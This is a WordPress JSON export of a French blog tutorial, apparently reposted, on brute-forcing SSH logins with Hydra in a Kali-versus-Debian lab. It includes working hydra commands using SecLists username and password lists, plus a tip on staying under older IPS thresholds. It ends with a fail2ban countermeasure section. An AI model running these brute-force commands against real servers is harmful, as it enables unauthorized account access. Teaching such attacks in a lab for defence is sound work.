{"id":3049,"date":"2024-11-17T10:20:25","date_gmt":"2024-11-17T09:20:25","guid":{"rendered":"https:\/\/hinakuu.xyz\/?p=3049"},"modified":"2024-11-17T10:53:46","modified_gmt":"2024-11-17T09:53:46","slug":"hydra-attaque-brute-force-simple","status":"publish","type":"post","link":"https:\/\/hinakuu.xyz\/?p=3049","title":{"rendered":"Hydra : L&rsquo;attaque brute force (simple)"},"content":{"rendered":"\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"579\" src=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Hydra-1024x579.jpg\" alt=\"\" class=\"wp-image-3050\" style=\"width:702px;height:auto\" srcset=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Hydra-1024x579.jpg 1024w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Hydra-300x169.jpg 300w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Hydra-768x434.jpg 768w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Hydra.jpg 1262w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Source : <a href=\"https:\/\/le-guide-du-secops.fr\/2020\/08\/15\/realiser-une-attaque-brute-force-avec-hydra-kalilinux\/\">https:\/\/le-guide-du-secops.fr\/2020\/08\/15\/realiser-une-attaque-brute-force-avec-hydra-kalilinux\/<\/a><\/p>\n\n\n\n<p><strong><em>L\u2019article qui va suivre contient des techniques et m\u00e9thodes qui peuvent s\u2019av\u00e9rer \u00eatre ill\u00e9gales et dangereuses si elles sont utilis\u00e9es \u00e0 mauvais escient. Ce tutoriel a pour unique but de vous enseigner \u00e0 vous prot\u00e9ger contre les \u201cblack-hat\u201d (Hackers mal intentionn\u00e9s) et ne doit en aucun cas \u00eatre utilis\u00e9 contre un particulier, une entreprise, une organisation \u00e0 but non lucratif ou une administration publique de quelconque pays.<\/em><\/strong><\/p>\n\n\n\n<p>je vais utiliser Kali linux (192.168.145.129\/24) sous sa derni\u00e8re version \u00e0 savoir 2020.2 \u00e0 ce jour, ainsi qu\u2019une machine victime (Debian 10.X) qui sera identifi\u00e9 par l\u2019adresse IP suivante : 192.168.145.141\/24.\u00a0<strong>La machine de l\u2019attaquante devra pouvoir communiquer avec la machine virtuelle cible Debian 10.X.<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Etape 1 \u2013 Pr\u00e9paration de l\u2019environnement<\/h3>\n\n\n\n<p>Si vous ne disposez pas de dictionnaire de mot de passe \/ nom d\u2019utilisateur, clon\u00e9 le repository git suivant :\u00a0<a href=\"https:\/\/github.com\/danielmiessler\/SecLists\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/danielmiessler\/SecLists<\/a>\u00a0(700mo), vous y trouverez votre bonheur. Pour ce tutoriel, je me baserai notamment sur les fichiers\u00a0<a href=\"https:\/\/github.com\/danielmiessler\/SecLists\/blob\/master\/Passwords\/xato-net-10-million-passwords-100.txt\" target=\"_blank\" rel=\"noreferrer noopener\">xato-net-10-million-passwords-100.txt<\/a>\u00a0et\u00a0<a href=\"https:\/\/github.com\/danielmiessler\/SecLists\/blob\/master\/Usernames\/top-usernames-shortlist.txt\" target=\"_blank\" rel=\"noreferrer noopener\">top-usernames-shortlist.txt<\/a>.<\/p>\n\n\n\n<p>NB : toutes ces commandes sont ex\u00e9cut\u00e9es par utilisateur root<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">cd \/home\/kali <br>mkdir passwords-and-usernames<br>git clone https:\/\/github.com\/danielmiessler\/SecLists<\/pre>\n\n\n\n<p>Copi\u00e9\/coll\u00e9, les dictionnaires de mots de passe \/ nom d\u2019utilisateurs (fichiers *.txt).<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> cp -r SecLists\/Usernames\/*.txt  \/home\/kali\/passwords-and-usernames\/<br> cp -r SecLists\/Passwords\/*.txt  \/home\/kali\/passwords-and-usernames\/<br> cd passwords-dict\/<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Etape 2 : Attaque depuis Kalilinux<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">Cibl\u00e9 un utilisateur particulier<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>-s = port<\/li>\n\n\n\n<li>-l = utilisateur simple<\/li>\n\n\n\n<li>-L = utilisateurs extraient d\u2019une liste<\/li>\n\n\n\n<li>-P = mots de passe extraient d\u2019une liste<\/li>\n\n\n\n<li>-T = nombre d\u2019essai par seconde (4, \u00e9tant une valeur recommand\u00e9, pour outrepasser certains IPS vieillissant et non mis \u00e0 jours)<\/li>\n\n\n\n<li>-V = Afficher tout les essais dans la fen\u00eatre du terminal<\/li>\n<\/ul>\n\n\n\n<p>D\u2019autres options disponible, pour d\u2019autres contexte.<\/p>\n\n\n\n<p>Pour plus d\u2019info :&nbsp;<code>hydra --help<\/code><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -s 22 -l root -P xato-net-10-million-passwords-10.txt 192.168.145.141 -t 4 -V ssh<\/pre>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"398\" src=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/9FMvf6A-1024x398.png\" alt=\"\" class=\"wp-image-3063\" srcset=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/9FMvf6A-1024x398.png 1024w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/9FMvf6A-300x117.png 300w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/9FMvf6A-768x298.png 768w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/9FMvf6A.png 1212w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Quand hydra d\u00e9couvre un couple de ID\/MDP correct, il l\u2019indique en vert<\/p>\n\n\n\n<p>Utilis\u00e9 une liste d\u2019username + un dico de mot de passe. Dans ce contexte chaque utilisateur sera test\u00e9 avec l\u2019ensemble des mots de passe de la liste.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -s 22 -L top-usernames-shortlist.txt -P xato-net-10-million-passwords-10.txt 192.168.145.141 -t 4 -V ssh<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Cibler un groupe d\u2019utilisateur donn\u00e9<\/h3>\n\n\n\n<p>Dans ce sc\u00e9nario, chaque mot de passe de la liste xato-net-10-million-passwords-10.txt sera test\u00e9 pour chaque utilisateur du fichier top-usernames-shortlist.txt. L\u2019attaque est bien plus longue, mais elle a plus de chances de r\u00e9ussir qu\u2019une attaque visant simplement un seul utilisateur.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -s 22 -L top-usernames-shortlist.txt -P xato-net-10-million-passwords-10.txt 192.168.145.141 -V ssh<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Contre-mesures<\/h3>\n\n\n\n<p>Afin de limiter ce genre d\u2019attaque, qui peut \u00eatre gravissime si elle aboutit, installez sur votre serveur Linux \u00ab&nbsp;victime&nbsp;\u00bb un IPS (Intrusion Prevention Software) comme le non moins c\u00e9l\u00e8bre Fail2ban, qui vous permet de limiter ce genre d\u2019attaque tr\u00e8s facilement.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">apt install fail2ban<br># Fail2ban est install\u00e9 et actif au boot<br># par d\u00e9faut fail2ban bloque une l'ip d'un utilisateur au bout de 4 essais infructueux.<\/pre>\n\n\n\n<p>Pour plus de renseignements, sur un param\u00e9trage avanc\u00e9 de fail2ban, consultez :\u00a0<a href=\"https:\/\/www.a2hosting.com\/kb\/security\/hardening-a-server-with-fail2ban\">https:\/\/www.a2hosting.com\/kb\/security\/hardening-a-server-with-fail2ban<\/a><\/p>\n\n\n\n<p>Voil\u00e0 le message que vous allez obtenir d\u00e8s \u00e0 pr\u00e9sent si vous retentez de nouvelle une attaque depuis la machine attaquante vers votre cible.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"119\" src=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Rzzf1Ns-1024x119.png\" alt=\"\" class=\"wp-image-3069\" srcset=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Rzzf1Ns-1024x119.png 1024w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Rzzf1Ns-300x35.png 300w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Rzzf1Ns-768x89.png 768w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/Rzzf1Ns.png 1243w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Connectez-vous sur la machine victime, et tapez la commande ci-dessous :<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"408\" height=\"172\" src=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/kwm6fjw.png\" alt=\"\" class=\"wp-image-3070\" srcset=\"https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/kwm6fjw.png 408w, https:\/\/hinakuu.xyz\/wp-content\/uploads\/2024\/11\/kwm6fjw-300x126.png 300w\" sizes=\"auto, (max-width: 408px) 100vw, 408px\" \/><\/figure>\n\n\n\n<p>Vous pouvez le constater, l\u2019IP de l\u2019attaquant a bien \u00e9t\u00e9 bloqu\u00e9e<\/p>\n\n\n\n<p>Pour d\u00e9banir votre ip, veuillez entrer la commande suivante :<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">fail2ban-client set sshd unbanip 192.168.0.X<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Source : https:\/\/le-guide-du-secops.fr\/2020\/08\/15\/realiser-une-attaque-brute-force-avec-hydra-kalilinux\/ L\u2019article qui va suivre contient des techniques et m\u00e9thodes qui peuvent s\u2019av\u00e9rer \u00eatre ill\u00e9gales et<\/p>\n","protected":false},"author":1,"featured_media":3050,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-3049","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-linux"],"_links":{"self":[{"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=\/wp\/v2\/posts\/3049","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3049"}],"version-history":[{"count":14,"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=\/wp\/v2\/posts\/3049\/revisions"}],"predecessor-version":[{"id":3073,"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=\/wp\/v2\/posts\/3049\/revisions\/3073"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=\/wp\/v2\/media\/3050"}],"wp:attachment":[{"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3049"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3049"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hinakuu.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3049"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}